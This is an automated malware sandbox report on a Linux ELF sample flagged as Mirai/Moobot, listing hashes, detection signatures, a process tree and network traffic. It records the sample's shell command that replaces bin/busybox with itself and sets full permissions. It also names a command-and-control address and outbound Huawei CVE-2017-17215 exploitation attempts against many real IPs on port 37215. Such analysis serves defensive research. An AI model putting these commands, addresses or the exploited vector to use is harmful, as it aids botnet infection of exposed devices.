
Linux Analysis Report
sduVQWDj8L.elf

Overview

General Information

Sample Name:sduVQWDj8L.elf
Original Sample Name:73f351e58cf41fb59c37b4196103c026.elf
Analysis ID:830728
MD5:73f351e58cf41fb59c37b4196103c026
SHA1:9337226b4d4876a4cb7eb287678360db263a6ef2
SHA256:04d57a6c870dec6d92d266d55ca978ab2f69a257e6f8d30e024af364e01ab166
Tags:32 elf mirai motorola

Detection

Mirai, Moobot
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Yara detected Mirai
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Moobot
Snort IDS alert for network traffic
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Sets full permissions to files and/or directories
Yara signature match
Executes the "mkdir" command used to create folders
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "chmod" command used to modify permissions
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample has stripped symbol table
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Analysis Advice

Static ELF header machine description suggests that the sample might not execute correctly on this machine.
None of the HTTP servers contacted by the sample answered. The sample is likely an old dropper that no longer works.
Joe Sandbox Version:37.0.0 Beryl
Analysis ID:830728
Start date and time:2023-03-20 16:39:44 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 30s
Hypervisor based Inspection enabled:false
Report type:light
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample file name:sduVQWDj8L.elf
Original Sample Name:73f351e58cf41fb59c37b4196103c026.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@1/0
  • Report size exceeded maximum capacity and may have missing network information.
  • TCP Packets have been reduced to 100
Command:/tmp/sduVQWDj8L.elf
PID:6230
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:mv: cannot stat '/tmp/sduVQWDj8L.elf'$'\377\377\377\377\377\377\354''H': No such file or directory
chmod: cannot access ''$'\377\354''Hbin/busybox': No such file or directory
  • system is lnxubuntu20
  • sduVQWDj8L.elf (PID: 6230, Parent: 6131, MD5: cd177594338c77b895ae27c33f8f86cc) Arguments: /tmp/sduVQWDj8L.elf
    • sh (PID: 6232, Parent: 6230, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox\\xff\\xec0\\x80 && mv /tmp/sduVQWDj8L.elf\\xff\\xff\\xff\\xff\\xff\\xff\\xecH bin/busybox\\x80; chmod 777 \\xff\\xecHbin/busybox"
      • sh New Fork (PID: 6234, Parent: 6232)
      • rm (PID: 6234, Parent: 6232, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/busybox
      • sh New Fork (PID: 6235, Parent: 6232)
      • mkdir (PID: 6235, Parent: 6232, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 6236, Parent: 6232)
      • mv (PID: 6236, Parent: 6232, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/sduVQWDj8L.elf\\xff\\xff\\xff\\xff\\xff\\xff\\xecH bin/busybox\\x80
      • sh New Fork (PID: 6237, Parent: 6232)
      • chmod (PID: 6237, Parent: 6232, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 \\xff\\xecHbin/busybox
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Name: MooBot
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
Yara matches (Source / Rule / Description / Author):
Source: sduVQWDj8L.elf    Rule: JoeSecurity_Moobot    Description: Yara detected Moobot    Author: Joe Security
Source: sduVQWDj8L.elf    Rule: JoeSecurity_Mirai_8    Description: Yara detected Mirai    Author: Joe Security
Source: sduVQWDj8L.elf    Rule: Linux_Trojan_Gafgyt_28a2fe0c    Description: unknown    Author: unknown
Yara matches in process memory dump (Source / Rule / Description / Author):
Source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp    Rule: JoeSecurity_Moobot    Description: Yara detected Moobot    Author: Joe Security
Source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp    Rule: JoeSecurity_Mirai_8    Description: Yara detected Mirai    Author: Joe Security
Source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp    Rule: Linux_Trojan_Gafgyt_28a2fe0c    Description: unknown    Author: unknown
Source: Process Memory Space: sduVQWDj8L.elf PID: 6230    Rule: JoeSecurity_Moobot    Description: Yara detected Moobot    Author: Joe Security
Source: Process Memory Space: sduVQWDj8L.elf PID: 6230    Rule: Linux_Trojan_Gafgyt_28a2fe0c    Description: unknown    Author: unknown
Snort IDS alerts:

Timestamp:03/20/23-16:42:31.188141
Source IP:192.168.2.23
Destination IP:41.46.204.168
            SID:2835222
            Source Port:33446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
Timestamp:03/20/23-16:40:34.606175
Source IP:192.168.2.23
Destination IP:103.161.181.97
            SID:2030490
            Source Port:51628
            Destination Port:56999
            Protocol:TCP
            Classtype:A Network Trojan was detected
Timestamp:03/20/23-16:41:11.152192
Source IP:192.168.2.23
Destination IP:41.232.131.216
            SID:2835222
            Source Port:58510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
Timestamp:03/20/23-16:41:36.868569
Source IP:192.168.2.23
Destination IP:197.214.97.175
            SID:2835222
            Source Port:49218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
Timestamp:03/20/23-16:42:32.484003
Source IP:103.161.181.97
Destination IP:192.168.2.23
            SID:2030489
            Source Port:56999
            Destination Port:51628
            Protocol:TCP
            Classtype:A Network Trojan was detected

            AV Detection

            Source: sduVQWDj8L.elfReversingLabs: Detection: 48%
            Source: sduVQWDj8L.elfVirustotal: Detection: 55%Perma Link

            Networking

            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.23:51628 -> 103.161.181.97:56999
            Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 103.161.181.97:56999 -> 192.168.2.23:51628
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58510 -> 41.232.131.216:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49218 -> 197.214.97.175:37215
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33446 -> 41.46.204.168:37215
            Source: global trafficTCP traffic: 197.253.112.134 ports 1,2,3,5,7,37215
            Source: global trafficTCP traffic: 157.83.242.115 ports 1,2,3,5,7,37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 58510 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 58510
            Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 33446 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 33446
            Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
            Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
            Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.46.210.63:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.79.81.120:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.108.109.222:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.125.244.239:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.223.224.45:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 181.230.148.17:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 82.146.118.235:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 175.98.4.235:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.111.237.152:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.219.251.180:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 181.64.185.56:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.232.116.197:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 218.105.67.203:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.230.74.66:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.32.24.79:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 62.114.183.91:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.166.84.26:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.116.207.127:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.206.218.186:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.137.13.93:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 27.64.30.117:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.219.55.145:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.9.140.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.136.120.132:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.180.126.239:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.54.9.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.220.119.26:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 118.188.118.17:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.124.237.127:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 209.122.214.70:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.64.46.159:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 98.169.190.141:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.0.141.212:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 150.223.142.65:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.175.29.86:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.156.80.62:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.113.11.254:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.212.186.30:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.146.98.220:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.192.109.163:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.47.56.101:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 174.223.44.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.76.14.208:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.63.193.133:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 186.209.44.85:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.55.115.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 54.92.251.62:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 46.81.189.114:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.37.39.80:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.163.42.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.32.93.25:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 1.230.208.79:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.61.219.37:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.57.171.8:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 165.149.30.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.19.13.171:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.115.146.22:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.37.11.111:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.64.119.87:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.28.45.243:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 75.8.197.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.207.93.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.66.254.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.26.107.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.74.185.186:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.126.107.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.40.33.113:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 195.81.231.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 67.57.87.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 138.127.184.108:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.138.28.106:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.123.89.72:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.254.164.242:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.10.251.189:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 180.71.45.164:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 124.30.69.214:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.121.23.8:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 47.67.123.172:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 27.79.122.95:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.13.199.178:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.215.5.88:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.44.126.193:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 70.107.249.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.245.57.66:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.97.228.87:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.17.130.174:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 13.81.137.91:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 24.68.246.236:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.77.32.68:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 182.78.189.179:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 120.115.162.19:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.140.175.31:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.26.135.255:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.83.130.94:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.136.199.186:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 17.215.202.14:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.80.91.209:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.46.245.18:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 12.162.181.15:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 144.19.133.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.175.179.125:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.109.137.59:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.125.113.99:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.222.99.122:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.124.173.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.244.66.51:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 103.92.175.63:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.189.157.155:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.70.80.65:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.68.165.235:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.7.109.151:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.253.232.213:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.124.67.199:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.63.127.141:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 131.209.40.107:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 76.128.227.31:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.158.111.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.45.60.91:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 34.222.171.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.17.215.179:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.228.172.224:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.8.73.153:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.231.54.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.48.126.98:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 160.100.59.151:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.48.140.115:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 133.30.209.56:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 184.108.27.205:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 185.135.173.227:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.193.103.137:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 66.127.85.205:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.109.55.12:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.157.204.141:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.231.42.162:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 137.157.153.156:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.59.58.169:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.20.137.131:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.38.49.105:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.15.235.148:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.172.28.50:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.83.242.115:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.120.149.116:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.0.94.155:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.200.248.220:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 24.136.1.129:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.64.107.112:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.131.52.202:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.211.24.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.121.35.130:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.175.188.75:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.24.30.126:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.115.86.220:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.228.112.3:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 102.193.113.234:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.2.1.23:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 1.83.251.68:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.244.64.25:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.124.131.120:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.11.24.189:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 181.72.182.181:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 171.3.109.231:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.183.36.247:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 222.1.162.120:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.233.10.123:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.165.80.167:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.106.98.67:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.67.159.0:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 132.25.202.248:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.220.149.203:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.109.112.45:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.208.38.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.167.219.16:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.37.59.48:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.170.229.206:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.129.81.64:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.201.130.95:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.64.82.71:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.64.91.7:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 43.254.92.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.78.216.196:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.50.57.54:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.20.241.134:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.110.180.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.22.176.124:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 129.165.50.96:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 80.229.188.239:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.27.192.223:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 58.193.118.232:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.126.253.166:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 46.91.243.207:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.2.2.208:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.237.165.55:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.201.54.35:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.146.164.213:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.140.21.199:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.129.222.122:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.175.128.34:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.92.57.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.87.159.77:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.71.111.250:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 59.81.3.212:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.67.241.8:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.45.193.83:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 164.130.254.81:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.46.137.210:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.248.196.33:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.180.178.167:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.95.63.119:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.78.211.2:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.27.52.173:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.173.151.86:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.60.170.86:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 106.195.54.191:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 104.3.17.161:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.105.148.103:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.28.213.91:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.141.91.112:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.132.8.112:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.67.224.125:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.165.77.54:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.206.151.89:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 158.233.249.216:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.42.193.47:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.6.6.61:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.29.233.187:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.193.84.73:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.59.98.222:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 125.171.1.178:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.86.222.181:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 78.226.212.82:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.179.150.139:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.146.165.106:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.80.92.140:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 40.85.255.70:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.125.40.64:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.103.131.103:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.176.226.12:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.201.175.229:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.75.116.188:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 130.19.3.40:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.47.149.122:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.16.187.202:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 2.151.108.14:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.59.140.115:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.94.62.212:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 152.201.111.100:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.41.31.171:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.212.161.182:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.48.52.213:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.178.176.144:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.16.129.188:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.48.166.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.32.39.35:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.128.167.7:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 197.119.38.31:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.220.61.65:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.196.172.237:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 157.212.133.19:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 51.84.244.148:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 90.172.181.126:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.173.45.192:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 176.223.95.41:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.131.124.152:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.139.224.69:37215
            Source: global trafficTCP traffic: 192.168.2.23:57377 -> 41.31.46.143:37215
